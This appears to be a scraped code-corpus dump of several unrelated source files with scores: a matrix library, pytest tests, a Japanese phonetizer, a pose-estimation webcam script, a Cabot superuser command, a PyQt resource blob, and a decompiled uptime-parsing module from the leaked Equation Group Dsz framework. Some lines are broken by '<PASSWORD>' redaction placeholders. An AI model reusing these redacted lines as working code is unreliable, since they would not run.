Vector(*args) elif type(other) == Matrix: if self.size()[1] != other.size()[0]: raise MatrixError(f"Matrix with {other.size()[0]} " f"rows cannot be multiplied" f" by {self.size()[1]} column matrix.") ret_mat = Matrix.create(self.size()[0], other.size()[1]) for i in range(self.size()[0]): for j in range(other.size()[1]): ret_mat[i][j] = self.row(i) * other.column(j) return ret_mat __rmul__ = __mul__ def __truediv__(self, other: REAL) -> 'Matrix': """Division. Matrix by number only.Though mathematically incorrect gives the possibility to return fractions for correct division. """ ret_mat = Matrix.create(*tuple(self.size())) for index, ele in enumerate(self): for j_index, j_ele in enumerate(ele): ret_mat[index][j_index] = Fraction(j_ele, other) return ret_mat def __pow__(self, power: int) -> 'Matrix': """Power operation for matrix^scalar.""" if self.size()[0] == self.size()[1]: raise MatrixError("Matrix must be quadratic.") if type(power) is not int: raise ArgumentError("Power od type"+str(type(power)), int) ret_mat = self if power == -1: return self.inverse() elif power == 0: return Matrix.create_identity(self.size()[0]) else: for i in range(1, power): ret_mat *= self return ret_mat def size(self, option: str = None) -> list: """Returns list of matrix size. [m, n]""" if not option: return [len(self._value), len(self._value[0])] elif option == "xy": return [len(self._value[0]), len(self._value)] def dim(self) -> int: """Returns the dimension of a matrix.""" return self.size()[0] * self.size()[1] def index(self, element: REAL) -> list: """Returns position of given element in a list. Can contain multiple return arguments. If ele is not in matrix an empty list is returned. """ position = [] for i in range(self.size()[0]): for e in self[i]: if element == e: position.append([self[i].index(e), i]) return position def no_fractions(self) -> 'Matrix': """Returns a matrix with no Fraction members. Fractions are converted to floats.""" ret_mat = Matrix.create(*tuple(self.size())) for index, ele1 in enumerate(self): for jindex, ele2 in enumerate(ele1): ret_mat[index][jindex] = float(ele2) return ret_mat def column(self, column_index: int) -> 'Vector': """Returns column with specific index.""" ret_list = [] for e in self._value: ret_list.append(e[column_index]) return Vector(*tuple(ret_list)) def row(self, row_index: int) -> 'Vector': """Returns row with specific index.""" return Vector(*tuple(self[row_index])) def append(self, row=None, column=None) -> 'Matrix': """Method to append rows or columns to matrix.""" ret_mat = self if row: if len(row) != self.size()[1]: raise MatrixError(f"Cannot append {len(row)} element row " f"to matrix with size {self.size()}.") ret_mat._value.append(list(row)) elif column: if len(column) != self.size()[0]: raise MatrixError(f"Cannot append {len(column)} element " f"row to matrix with size{self.size()}") for i in range(ret_mat.size()[1]): ret_mat._value[i].append(column[i]) return ret_mat def remove(self, row_index: int = None, column_index: int = None) -> 'Matrix': """Returns a matrix with given row or column removed.""" ret_mat = copy.deepcopy(self) if row_index is not None: del ret_mat._value[row_index] if column_index is not None: for i in range(len(ret_mat._value)): del ret_mat._value[i][column_index] return ret_mat def transpose(self) -> 'Matrix': """Returns transposed matrix.""" args = [] for i in range(self.size()[1]): args.append(list(self.column(i))) return Matrix(*tuple(args)) def det(self) -> REAL: """Returns determinant of a matrix.""" if self.size()[0] != self.size()[1]: raise MatrixError("Matrix must be quadratic.") if self.size() == [1, 1]: return self[0][0] else: answer = 0 for i in range(self.size()[1]): smaller_matrix = self.remove(0, i) k = (-1) ** i * self[0][i] * smaller_matrix.det() answer += k return answer __abs__ = det def cof(self) -> 'Matrix': """Returns cofactor matrix.""" ret_mat = Matrix.create(self.size()[0], self.size()[1]) for i in range(self.size()[1]): for j in range(self.size()[0]): smaller_matrix = self.remove(i, j) if smaller_matrix.size() == [1, 1]: ret_mat[i][j] = (-1) ** (i + j) * smaller_matrix[0][0] else: ret_mat[i][j] = (-1) ** (i + j) * self.remove(i, j).det() return ret_mat def adj(self) -> 'Matrix': """Returns adjunct of a matrix.""" return self.cof().transpose() def inverse(self) -> 'Matrix': """Returns inverse matrix.""" if self.size()[0] != self.size()[1]: raise MatrixError("Matrix must be quadratic.") if self.det() == 0: raise ZeroDivisionError("Determinant must not be 0.") ret_mat = self.adj() / self.det() return ret_mat def ref(self) -> 'Matrix': """Row echelon form of a matrix.""" sorted_arg_list = Matrix.__leading_zero_sort(list(self)) for i in range(len(sorted_arg_list)): sorted_arg_list = Matrix.__leading_zero_sort(sorted_arg_list) element = sorted_arg_list[i] if element.leading_zeros() == len(element): continue sorted_arg_list[i] = element / element[element.leading_zeros()] if i == len(sorted_arg_list): break for j in range(i+1, len(sorted_arg_list)): jelement = sorted_arg_list[j] if jelement.leading_zeros() == element.leading_zeros(): op_vector = sorted_arg_list[i]\ * jelement[jelement.leading_zeros()] sorted_arg_list[j] = jelement - op_vector sorted_arg_list = tuple(map(list, sorted_arg_list)) return Matrix(*sorted_arg_list) def rank(self) -> int: """Rank of the matrix.""" ret_val = 0 ref_mat = self.ref() for ele in ref_mat._value: for sub_ele in ele: if abs(sub_ele) > 1e-14: ret_val += 1 break return ret_val def rref(self) -> 'Matrix': """Reduced row echelon form.""" ret_list = [Vector(Tuple(e)) for e in self.ref()] for i in range(self.rank()-1, 0, -1): for j in range(i): ret_list[j] -= ret_list[i]\ * ret_list[j][ret_list[i].leading_zeros()] return Matrix(*tuple([list(e) for e in ret_list])) @staticmethod def create(m: int, n: int) -> 'Matrix': """Staticmethod to create an m X n matrix that contains only zeros. """ args = [] for i in range(m): args.append([]) for j in range(n): args[i].append(0) return Matrix(*tuple(args)) @staticmethod def create_identity(n: int) -> 'Matrix': """Staticmethod to create an identity matrix with any amount of rows. """ ret_mat = Matrix.create(n, n) for i in range(n): for j in range(n): ret_mat[i][j] = 1 if i == j else 0 return ret_mat @staticmethod def __leading_zero_sort(arg_list: list) -> 'list': """Sorts value list of matrix for ref.""" longest_row = [] for index, element in enumerate(arg_list): longest_row.append( [Vector(Tuple(list(element))).leading_zeros(), index] ) sorted_longest_row = sorted(longest_row) sorted_arg_list = [] for i in range(len(arg_list)): sorted_arg_list.append( Vector(Tuple(list(arg_list[sorted_longest_row[i][1]]))) ) return sorted_arg_list class SLE(Matrix): """System of linear equations""" def __init__(self, *args: List[REAL]): """Initializes a matrix that contains both, coefficients and results. Insert in the following way: SLE([a_11, a_12, a_13, b_1], [a_21, a_22, a_23, b_2], [a_31, a_32, a_33, b_3]) for | a_11 x_1 + a_12 x_2 + a_13 x_3 = b_1 | | a_21 x_1 + a_22 x_2 + a_23 x_3 = b_2 | | a_31 x_1 + a_32 x_2 + a_33 x_3 = b_3 | """ super().__init__(*args) if self.size()[1] != self.size()[0] + 1: raise MatrixError( "Matrix for SLE must have the size m x n where n = m +1" ) self.A = self.remove(column_index=-1) self.b = self.column(-1) def solve(self) -> 'Vector': """Splits matrix in coefficients and results and uses matrix multiplication to solve the system. """ return self.A.inverse() * self.b def x(self, index: int) -> REAL: """Returns the unknown of given index. Starts at 0""" return self.solve()[index]
2.765625
3
test/test_grid_interface.py
Anthonyntilelli/prewar_login_game
1
12789722
"""Interface Test with Pytest.""" import pytest # type: ignore from grid.interface import Interface from grid.settings import DEFAULT_EASY # Protected access used to test functions # Used by fixtures functions # pylint: disable=W0212, W0621 @pytest.fixture(scope="function") def easy_interface(): """Create easy grid interface.""" return Interface(4, DEFAULT_EASY) def test__init__(easy_interface): """Test init correct and starts at upper left.""" tester = easy_interface assert tester.line == 4 assert tester.place == 7 assert tester.start == (4, 7, 27) assert tester.end == (19, 18, 38) def test_keyboard_input_movement(easy_interface): """Test moment for keyboard_input.""" tester = easy_interface # Move down assert tester.keyboard_input("KEY_DOWN") == "M" assert tester.keyboard_input("s") == "M" assert tester.line == 6 # moved down 2 # Move Up assert tester.keyboard_input("KEY_UP") == "M" assert tester.keyboard_input("w") == "M" assert tester.line == 4 # moved up 2 # Move Right assert tester.keyboard_input("KEY_RIGHT") == "M" assert tester.keyboard_input("d") == "M" assert tester.place == 9 # moved up 2 # Move Left assert tester.keyboard_input("KEY_LEFT") == "M" assert tester.keyboard_input("a") == "M" assert tester.place == 7 # moved up 2 def test_keyboard_input_non_movement(easy_interface): """Test quit, enter and non-recognized on keyboard_input.""" tester = easy_interface assert tester.keyboard_input("q") == "Q" assert tester.keyboard_input("\x1b") == "Q" assert tester.keyboard_input("\n") == "S" assert tester.keyboard_input("i") == "N" def test_exact_grid_location(easy_interface): """Tests exact_grid_location translate to columns properly.""" tester = easy_interface assert tester.line == 4 assert tester.place == 7 assert tester.exact_grid_location() == (True, 0, 0) # Middle Right position tester._line = 12 tester._place = 28 assert tester.exact_grid_location() == (False, 8, 1) def test_movement_boundaries(easy_interface): """Test to ensure user cannot move outside grid.""" tester = easy_interface assert not tester._move_up() assert not tester._move_left() # Move to lower right tester._line = tester.end[0] tester._place = tester.end[2] assert not tester._move_down() assert not tester._move_right() def test_movement_horizontal_jump(easy_interface): """Test that player does not enter right filler column.""" tester = easy_interface # Right Jump tester._place = 18 assert tester._move_right() assert tester.place == 27 # Left Jump assert tester._move_left() assert tester.place == 18
2.734375
3
python/20190311/my_djangos/django_share_app/shares/admin.py
Realize0917/career
3
12789723
from django.contrib import admin from .models import Upload admin.site.register(Upload)
1.179688
1
Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Lib/dsz/mca/status/cmd/uptime/data/dsz/__init__.py
bidhata/EquationGroupLeaks
9
12789724
# uncompyle6 version 2.9.10 # Python bytecode 2.7 (62211) # Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10) # [GCC 6.2.0 20161005] # Embedded file name: __init__.py import dsz import dsz.cmd import dsz.data import dsz.lp class UpTime(dsz.data.Task): def __init__(self, cmd=None): dsz.data.Task.__init__(self, cmd) def _LoadData(self): try: self.IdleTime = UpTime.IdleTime(dsz.cmd.data.Get('IdleTime', dsz.TYPE_OBJECT)[0]) except: self.IdleTime = None try: self.UpTime = UpTime.UpTime(dsz.cmd.data.Get('UpTime', dsz.TYPE_OBJECT)[0]) except: self.UpTime = None return class IdleTime(dsz.data.DataBean): def __init__(self, obj): try: self.Days = dsz.cmd.data.ObjectGet(obj, 'Days', dsz.TYPE_INT)[0] except: self.Days = None try: self.Hours = dsz.cmd.data.ObjectGet(obj, 'Hours', dsz.TYPE_INT)[0] except: self.Hours = None try: self.Minutes = dsz.cmd.data.ObjectGet(obj, 'Minutes', dsz.TYPE_INT)[0] except: self.Minutes = None try: self.Seconds = dsz.cmd.data.ObjectGet(obj, 'Seconds', dsz.TYPE_INT)[0] except: self.Seconds = None return class UpTime(dsz.data.DataBean): def __init__(self, obj): try: self.Days = dsz.cmd.data.ObjectGet(obj, 'Days', dsz.TYPE_INT)[0] except: self.Days = None try: self.Hours = dsz.cmd.data.ObjectGet(obj, 'Hours', dsz.TYPE_INT)[0] except: self.Hours = None try: self.Minutes = dsz.cmd.data.ObjectGet(obj, 'Minutes', dsz.TYPE_INT)[0] except: self.Minutes = None try: self.Seconds = dsz.cmd.data.ObjectGet(obj, 'Seconds', dsz.TYPE_INT)[0] except: self.Seconds = None return dsz.data.RegisterCommand('UpTime', UpTime) UPTIME = UpTime uptime = UpTime
2.375
2
profile_generator/model/color/constants.py
nethy/profile-generator
0
12789725
<filename>profile_generator/model/color/constants.py from profile_generator.model.color.space import SRGB from . import lab MIDDLE_GREY_LUMINANCE_SRGB = SRGB.gamma(lab.to_xyz([50, 0, 0])[1])
1.773438
2
ScratchWork/SkeletonGrabber.py
RoHawks/InnovationChallenge2021
0
12789726
import cv2 import pyvirtualcam import numpy as np #from pynput import keyboard from tf_pose import common from tf_pose.estimator import TfPoseEstimator from tf_pose.networks import get_graph_path, model_wh import time from tf_pose.common import CocoPart from util import calcThetas from comparator import compareBodies import json from video_filter import Filter class Control: """ main class for this project. Starts webcam capture and sends output to virtual camera""" def __init__(self, webcam_source=1, width=640, height=480, fps=30): """ sets user preferences for resolution and fps, starts webcam capture :param webcam_source: webcam source 0 is the laptop webcam and 1 is the usb webcam :type webcam_source: int :param width: width of webcam stream :type width: int :param height: height of webcam stream :type height: int :param fps: fps of videocam stream :type fps: int """ self.webcam_source = webcam_source # initialize webcam capture self.cam = cv2.VideoCapture(self.webcam_source) self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, width) self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, height) self.cam.set(cv2.CAP_PROP_FPS, fps) # Query final capture device values (different from what i set??) # save as object variables self.width = int(self.cam.get(cv2.CAP_PROP_FRAME_WIDTH)) self.height = int(self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT)) self.fps = self.cam.get(cv2.CAP_PROP_FPS) # print out status print('webcam capture started ({}x{} @ {}fps)'.format(self.width, self.height, self.fps)) # filter object self.videofilter = Filter(self.width, self.height) # self.logger = logger.Logger() def getangles(self): """ contains main while loop to constantly capture webcam, process, and output :return: None """ user = "tester" with pyvirtualcam.Camera(width=self.width, height=self.height, fps=self.fps) as virtual_cam: virtual_cam.delay = 0 fps_time = 0 frame_count = 0 e = TfPoseEstimator(get_graph_path("mobilenet_v2_small"), target_size=(self.width, self.height)) print(f'virtual camera started ({virtual_cam.width}x{virtual_cam.height} @ {virtual_cam.fps}fps)') print('TfPoseEstimator loaded') while True: frame_count += 1 # STEP 1: capture video from webcam ret, raw_frame = self.cam.read() # STEP 2: process frames if raw_frame is None: continue humans = e.inference(raw_frame, resize_to_default=True, upsample_size=4) return str(calcThetas(humans))
2.625
3
jphones/phonetizer.py
JRMeyer/jphones
2
12789727
# The functions here assume input as a list of tokens (ie tokenized sentences), # where each token was information about whether it is a word or a number. # The text is assumed to be either japanese of English (target application is # Japanese text which may contain English or Romanji). # # The token type may be (1) Hiragana // native Japanese words # (2) Katakana // foreign words # (3) Kanji # (4) Romaji // Hepburn romanization # (5) English # # # Dependencies: pip3 install six semidbm pykakasi import pykakasi as pkk import japanese_numbers as jnums from jphones import num2kana class Phonetizer: def __init__(self): kakasi = pkk.kakasi() kakasi.setMode("H","a") # Hiragana to ascii kakasi.setMode("K","a") # Katakana to ascii kakasi.setMode("J","a") # Japanese to ascii kakasi.setMode("r","Hepburn") # use Hepburn Roman table self.numConverter = num2kana.Converter() self.wordConverter = kakasi.getConverter() self.phonemes='' self.token='' self.type='' def convert_token(self, token): self.type=token['type'] self.token=token['token'] if token['type'] == 'word': self.phonemes = self.wordConverter.do(self.token) elif token['type'] == 'number': if ',' in self.token: self.token = self.token.replace(",", "") kana=self.numConverter.conv(jnums.to_arabic(token['token'])[0]) self.phonemes = self.wordConverter.do(kana) def get_phonemes(self, token): self.convert_token(token) if self.phonemes == "NUM-TOO-LARGE": newToken = {'phonemes' : [self.phonemes], 'token': self.token, 'type': self.type} else: newToken = {'phonemes' : list(self.phonemes), 'token': self.token, 'type': self.type} return newToken def demo(): tokens= [{'type':'word', 'token': u'日本'}, {'type':'word', 'token': u'<PASSWORD>'}, {'type':'word', 'token': u'食べる'}, {'type':'word', 'token': u'<PASSWORD>'}, {'type':'word', 'token': u'<PASSWORD>'}, {'type':'number', 'token': u'<PASSWORD>'}, {'type':'number', 'token': u'<PASSWORD>'}, {'type':'number', 'token': u'<PASSWORD>'}, {'type':'number', 'token': u'<PASSWORD>'}] for token in tokens: j2p = Phonetizer() phonemes = j2p.get_phonemes(token) print(phonemes) if __name__ == '__main__': demo()
3.625
4
cabot/cabotapp/management/commands/create_cabot_superuser.py
TheBestBurler/cabot
0
12789728
import os from django.contrib.auth import get_user_model from django.core.management.base import BaseCommand from django.db import IntegrityError class Command(BaseCommand): def handle(self, *args, **options): username = os.environ.get('CABOT_SUPERUSER_USERNAME') if username: try: get_user_model().objects.create_superuser( username=username, email=os.environ.get('CABOT_SUPERUSER_EMAIL'), password=<PASSWORD>('<PASSWORD>') ) print('Created superuser "{}"'.format(username)) except IntegrityError: print('Superuser "{}" already exists'.format(username)) else: print('CABOT_SUPERUSER_USERNAME environment variable not found, not creating superuser')
2.765625
3
Logos_rc.py
digvijayad/Sentiment-Analysis
0
12789729
# -*- coding: utf-8 -*- # Resource object code # # Created by: The Resource Compiler for PyQt4 (Qt v4.8.7) # # WARNING! All changes made in this file will be lost! from PyQt4 import QtCore qt_resource_data = b"\ \x00\x00\x91\xc2\ \x89\ \x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\ \x00\x01\x78\x00\x00\x01\x78\x08\x06\x00\x00\x00\x5e\x9d\xe2\xa6\ \x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0b\x13\x00\x00\x0b\x13\ \x01\x00\x9a\x9c\x18\x00\x00\x00\x19\x74\x45\x58\x74\x53\x6f\x66\ \x74\x77\x61\x72\x65\x00\x41\x64\x6f\x62\x65\x20\x49\x6d\x61\x67\ \x65\x52\x65\x61\x64\x79\x71\xc9\x65\x3c\x00\x00\x91\x4f\x49\x44\ \x41\x54\x78\xda\xec\x7d\x09\x98\x14\xc5\xdd\x7e\x41\xcc\xe1\x81\ \xe0\x0d\x5e\xbb\xe2\x01\x18\x95\x5d\x50\x8c\x0a\x61\xf0\x88\x08\ \x0a\x8b\x57\x14\x3e\xc2\xae\x41\x41\x8d\xb2\xc4\x0f\x25\x11\x61\ \x41\x8c\x28\x7f\xc3\xa2\x31\x82\x22\x0c\xf1\x43\xbc\x59\x50\x14\ \x35\xca\xac\xe2\x85\x22\xbb\xf1\xc6\x6b\x11\x0f\xbc\x59\xd1\x98\ \x7c\xf9\x12\xfe\xfd\x36\x55\x4b\x4f\x4f\x55\x75\x55\x4f\xf7\x4c\ \x77\x4f\xbd\xcf\x33\x0f\xcb\x1c\x7d\x56\xbf\xf5\xab\xf7\x77\xb5\ \xdb\xb2\x65\x0b\x31\x30\x88\x23\xda\xb5\x6b\x97\xe2\xbc\x9d\xca\ \x73\xb3\x19\xf7\x1b\xd6\x33\x92\x31\x57\xdb\x20\x96\xcf\x88\x21\ \x78\x83\x08\x11\x76\x27\xeb\x9f\x0a\x17\x51\x97\xd3\x17\xfb\xbb\ \xac\xc8\x87\xb9\xde\x7a\xb5\xd0\xbf\x5b\x1c\x7f\xb3\x49\xa0\xc9\ \x7a\xa6\x36\x99\xbb\x69\x60\x08\xde\xa0\x14\x49\x9c\x11\x36\x88\ \xbc\x13\x25\x72\xfc\xdb\x33\x61\xa7\xda\x6c\xbd\x40\xf4\x4d\x74\ \x12\xb0\xff\xb5\x9e\xb7\x16\x33\x0a\x0c\x0c\xc1\x1b\x24\xc5\x1a\ \x67\x2f\x90\x7a\x7f\x73\x65\x6c\x34\x3a\xac\xff\x8c\xb1\xfa\x0d\ \x0c\xc1\x1b\x44\x9d\xd0\x53\xd4\x1a\x67\x84\x5e\x66\xae\x8a\x16\ \xd6\x53\x2b\xbf\xc9\x90\xbe\x81\x21\x78\x83\x62\x92\x79\x39\x25\ \x71\x46\xea\xc5\x92\x57\x1a\x39\xef\x65\xf2\xdc\x26\x93\x8e\x9c\ \x28\xd6\xca\xa3\xd9\x41\xf8\x19\x23\xef\x18\x18\x82\x37\x08\x83\ \xd0\x99\x56\x5e\x45\xff\x0d\xd3\x3a\x77\x6a\xd7\x9b\x1c\x7f\x03\ \x45\xd7\xb0\x1d\x3e\x04\xe7\x64\xe0\x74\x0e\x87\x39\x19\xac\x67\ \x64\x6f\x08\xdf\xc0\x10\xbc\x41\x3e\x44\x56\x41\x09\xbd\x2a\x04\ \x0b\xbd\x91\x64\x3b\x20\x5b\x92\x26\x49\x50\xc9\x8a\x11\x3f\x9b\ \x14\x82\x26\xff\x66\x4a\xf6\x0d\x26\x94\xd3\xc0\x10\xbc\x81\xaa\ \x95\x8e\x57\xc7\x80\x2c\x4e\xa7\xae\x5c\xf2\x51\x24\x8e\x15\x40\ \x8a\x6c\x8b\x26\x0a\x62\x02\x6d\x65\x64\x4f\x09\xdf\xe8\xf7\x06\ \x86\xe0\x0d\xa9\xb7\x11\xfa\xd0\x80\xc9\xdc\x38\x09\xf5\x2d\x7e\ \x67\xd4\x51\xbe\xa4\xdf\xe8\x20\xfb\x16\x73\x85\x0d\xc1\x1b\x18\ \x52\xf7\x23\x0f\xd8\x84\x1e\x45\x12\xe9\xd1\x6e\x22\xb3\x96\x65\ \x68\x79\x63\xcb\x8c\x96\x88\xde\x27\x46\xfa\xf8\xb7\x7f\x9e\xf7\ \xaa\xde\x58\xf6\x86\xe0\x0d\x92\x4b\xec\x8c\xd4\x47\xe5\x61\xa1\ \x67\xc8\x36\xcd\x37\x74\xa2\x70\x11\x74\xca\xf1\x51\xca\xf5\xd5\ \xb0\x1c\x9b\xee\x28\x9d\x0c\xe7\xef\x82\x4d\x10\xd4\xca\x67\x8e\ \x6e\xbf\x16\xfe\x52\x7a\xff\xd2\xe6\xa9\x30\x04\x6f\x10\x6f\x52\ \x07\x39\xd6\x52\x52\x28\xf3\x49\x06\x99\xb0\x96\xf9\x0e\x02\x67\ \xd1\x28\xce\x7f\x3b\xc6\xec\x72\xb7\x92\x6d\x91\x3f\xce\x7f\x43\ \x99\x00\x1c\x2b\x31\x46\xfa\x1d\x7d\x1c\x2f\x24\x9c\x7a\xeb\xde\ \x36\x99\xa7\xc5\x10\xbc\x41\x7c\x88\xbd\xda\xfa\xa7\xda\x87\x65\ \xcb\x1e\x7a\xbc\x32\x41\x59\xe9\x0e\x22\x4f\x91\xf0\x22\x4a\xa2\ \x0e\x77\xf6\x6a\xa0\xc4\x4f\xa3\x9e\xaa\x7d\x4e\xe6\x46\xc2\x31\ \x04\x6f\x10\x03\x6b\xbd\x9a\x5a\xec\x3a\xd6\x5c\x1b\xa9\x5b\x63\ \xa1\x21\x20\x32\x67\x8e\xc2\x54\x4c\xad\xf1\x42\x5b\xfd\x19\xfa\ \x6f\x53\x10\xa4\x4f\xc9\x3e\x45\xc7\x43\x4f\x1f\x63\xa1\xce\x38\ \x66\x0d\xc1\x1b\x44\x83\xd8\xd9\x83\x3c\xca\xc7\x83\x9c\x37\xa9\ \x5b\x84\xee\xcc\x68\x35\x25\x0a\xf2\xc7\x7a\x07\xe9\x67\x2c\xc2\ \x6f\xca\x73\x7c\x94\x13\x7f\x32\x1d\x56\x1c\xf5\x41\x4c\xfa\x06\ \x86\xe0\x0d\xf4\x1f\xdc\x6a\xa2\x2f\xc3\xe4\xed\x60\x73\x11\x7a\ \xca\x58\xe7\x05\xb1\xf2\x33\x41\x10\x3e\xb5\xec\x19\xd9\xab\xde\ \xb7\xf5\xd4\xa2\x4f\x9b\x5b\x61\x08\xde\xa0\x30\xc4\x5e\xa7\x61\ \x8d\xe1\x01\xc5\xc3\x99\xf6\xb3\xec\xb6\x08\x3d\x5f\x67\x9e\x41\ \xf0\x84\xdf\x40\x09\xbf\xc1\x22\xfc\x4d\x79\x8c\x23\x1d\x03\x01\ \xfb\xad\xa7\x56\xbd\xd1\xe9\x0d\xc1\x1b\x14\x99\xd8\x97\xd2\x87\ \x31\xe3\x83\xd4\xcb\x29\x99\x63\x9f\x91\xae\xd3\x5e\x51\xd1\xc5\ \xfe\xb7\xf3\x3e\x3b\x93\x1e\xd6\xdf\xb3\xae\x51\x3b\xdd\xae\x07\ \xed\x46\x2e\xfe\x5d\x8a\xbc\xb6\xe6\x43\xfb\xff\x1f\xaf\xdf\x44\ \x36\x7e\xf4\x8d\xfd\xf7\x27\x1b\x37\x93\x4f\x37\x7e\x1b\x97\xa1\ \xd1\x4c\x27\x70\x5f\xd6\xbd\x43\xc2\xa9\x56\x9c\xbc\x0d\xd1\x1b\ \x82\x37\x28\x12\xb1\xb3\x87\x4f\xdb\x5a\xa7\xd2\x4b\x35\x29\x6e\ \x75\x48\x2d\x80\xa4\x97\xbf\x3d\x21\xeb\xbd\x23\x3b\x4c\x21\xdf\ \x7d\xfb\x4f\xa5\x89\x61\xf1\xda\x71\x9e\xdf\xfb\xe0\x8d\xcf\xc8\ \x07\x6f\x7d\xde\xf6\xff\xe7\x1e\x5f\x47\xde\x7a\xf5\x53\xf2\xcc\ \x53\x2d\x51\xbc\x24\xeb\xa9\x75\x9f\xf6\x49\xf6\x3a\x56\xbd\x21\ \x7a\x43\xf0\x06\x05\x22\x76\x5f\x3a\x29\xb5\xd4\xd9\x43\x1d\x3b\ \xe7\xe8\xf8\x2b\x53\xe4\x82\xe9\x03\xb3\xde\x1b\xdd\x7f\x8e\x12\ \xf9\x9e\x77\xd1\xd1\x64\xc2\xcd\xc3\xfc\xeb\x24\x5f\x7c\x47\xea\ \xaa\xef\x21\x2b\x96\xbf\x15\xd5\xcb\xe3\x9b\xec\x35\x1d\xf7\x86\ \xe8\x0d\xc1\x1b\x84\x44\xec\x8d\x94\xd8\x33\xaa\xdb\x77\x68\xea\ \xb5\x85\xb2\xd4\x61\x69\xef\xbc\xd3\x8f\xda\x64\x94\x5b\x67\x3f\ \xa7\x64\x65\x7b\xe1\xd1\xd7\x7f\x4b\xf6\xef\xb1\x67\xd6\x7b\xb7\ \x4e\x5a\xa1\x24\xd3\xc8\x08\xfe\xe1\xf9\x2f\xb6\x49\x37\xc7\x9c\ \x74\x08\xd9\xbf\xdb\x1e\x39\xfb\x51\xdd\xdf\xf3\x9f\x5f\x45\x5e\ \x59\xd5\x42\x5e\x7f\x69\x03\x59\xfd\x74\x0b\xf9\xee\x9b\x6d\xe7\ \xfd\xf6\x3b\x5f\x05\x72\x1d\x14\xc0\x64\x9c\xb4\x8e\x66\xaf\x29\ \xdf\x18\xa2\x37\x04\x6f\xe0\x61\x35\xd5\x29\x2e\x8f\xb5\xf5\x75\ \x8b\xd8\x75\xac\xb2\x40\x71\xdb\x92\x91\xa4\x6f\xd5\x4f\xb3\x08\ \xf4\xb2\x5f\xdf\x1f\xb8\x3c\x03\xbc\xb2\xea\x7d\x72\x76\xbf\xb9\ \x79\x11\xfc\xb9\x95\xb3\x49\x53\xd3\x27\x59\xef\x4d\x9e\x79\x0a\ \x39\xf7\xbf\xfb\x2b\x7f\x1f\xd8\x71\xa7\x1f\x93\x97\x36\x4f\x15\ \x1e\x83\xe8\x77\x21\x63\x29\x25\xfa\x06\x8d\xb1\xd9\x89\x12\xbd\ \x4a\x8e\x85\x89\xba\x89\x10\xda\x9b\x4b\x50\x74\x62\x2f\xb7\x5e\ \x78\xd8\x56\x2a\x90\xfb\x42\xeb\x75\x80\xf5\xf0\x54\xa9\x90\x3b\ \xac\x75\xeb\x55\x6b\xbd\x5a\xe8\xf6\x47\x45\xe1\x9c\x07\x9d\x77\ \x14\x39\xee\xe7\xe5\x79\x6d\x63\xe8\x2f\x0f\xe7\xbe\x7f\x78\xdf\ \x03\xc8\x5e\x9d\x77\x0a\xfc\x98\x6f\x98\xfa\xa4\x2d\xcb\xf0\x30\ \xf2\x92\x63\xb9\xef\x1f\x7c\xd0\xae\xd2\x6d\x16\x81\xdc\xed\x4b\ \x67\xbd\x96\x60\x4c\x58\xaf\x3a\x2a\xd3\x49\x01\x8b\xdc\x7a\xc1\ \xf8\xc0\x77\xa7\x52\x6b\x5d\x04\xac\x3c\x17\x58\x63\xba\x89\x1a\ \x2d\x06\x86\xe0\x4b\x92\xd8\x3b\x59\x2f\x3c\x34\xef\x13\xef\xaa\ \x8e\x8c\xd8\xab\x55\x9c\xa7\x70\x98\x5a\x2f\x58\x50\x5f\x5b\xaf\ \x59\x24\x82\xfa\xfa\x0d\xf7\x8f\xcc\x8b\x88\x07\x8e\xe8\x25\xfc\ \xac\xb2\xf7\x3e\x9e\xbf\xff\x69\xef\x7d\xb5\xf6\x07\x29\x05\x52\ \x0b\x0f\xc7\x0d\x39\x94\x4f\xf0\x87\xee\x29\xdc\x1e\x56\x1a\x45\ \x06\xc6\xc4\x14\x8c\x3f\x8c\x15\xba\xc2\x0b\x92\xe8\x21\xff\xad\ \x84\xf1\x42\xa5\x1e\x03\x43\xf0\x25\x43\xee\x90\x4a\x5a\xe8\x03\ \x26\x03\x34\xf6\x01\x1a\xc4\x5e\x6d\xbd\x60\xd9\xaf\x8d\x8a\xb5\ \x2e\x42\xc7\xdd\x77\x24\xd3\x6f\xf1\xe7\xe4\x84\x3c\x23\xd2\xc4\ \x81\x3e\xa9\xae\x9e\xdb\xd8\x79\xd7\x1d\x84\x9f\x41\x1b\xd7\x3d\ \x17\x1e\xf6\x3d\x60\x17\xe1\x6f\x5e\x7d\xfe\x83\x28\xdd\x0e\x8c\ \x95\x95\xd6\xd8\x69\xc2\x18\x0a\x98\xe8\x61\xbc\xbc\x0f\x63\x86\ \x4a\x3d\x06\x05\xc4\x76\xe6\x12\x14\x94\xd8\x11\x8a\x58\xaf\x20\ \xc5\x28\x3b\x4f\x1d\x4e\xd3\x3a\x12\xb3\x48\x18\xe8\xf2\x67\x0d\ \xef\x49\xee\xbd\xb3\x59\x4f\x63\x10\xc8\x33\x6d\x16\xf5\xe0\x1e\ \x84\x4c\x78\xc4\xf7\x71\x05\xe5\xf8\x3c\xf4\xc8\xfd\x84\x9f\xbd\ \xb1\xf6\x63\xed\x49\xad\x77\x9f\x7d\xed\x49\xc3\xb9\xdd\x0d\xef\ \x7c\x41\x3e\x7c\xff\x2b\xf2\xf2\xb3\x1f\x04\xe1\xb4\x85\xd5\xbd\ \x00\xd2\x0d\xd9\xea\x94\xad\x97\x39\x65\xa9\x33\x15\xc4\x8d\x31\ \x5d\xeb\x61\xb0\xe0\xb3\x6a\xeb\xbb\xb5\xa6\xfc\x81\x21\xf8\xc4\ \xc9\x31\x0a\x0f\x00\xa0\xec\xa0\xa2\xc4\xae\xea\xf8\x52\x06\x1c\ \x83\x41\x47\x76\x38\x1d\xac\x6e\x5c\x36\x7b\x08\x59\xb3\xfa\x43\ \xf2\xde\x3b\x5f\x06\x22\xcf\x00\xb0\xee\x21\xff\x14\x2a\x59\x09\ \xb1\xf2\x3c\x1c\xde\x57\xac\x4c\xbc\xfd\xfa\x67\x4a\xdb\x86\xaf\ \x62\xdc\x35\x27\xdb\xbe\x05\x15\x40\xfa\xb9\xf7\x96\xe7\xc9\x53\ \x4f\xbe\x9b\xcf\xf9\x33\xf9\x06\xfe\x9b\x7a\x0d\xa2\x4f\x53\x43\ 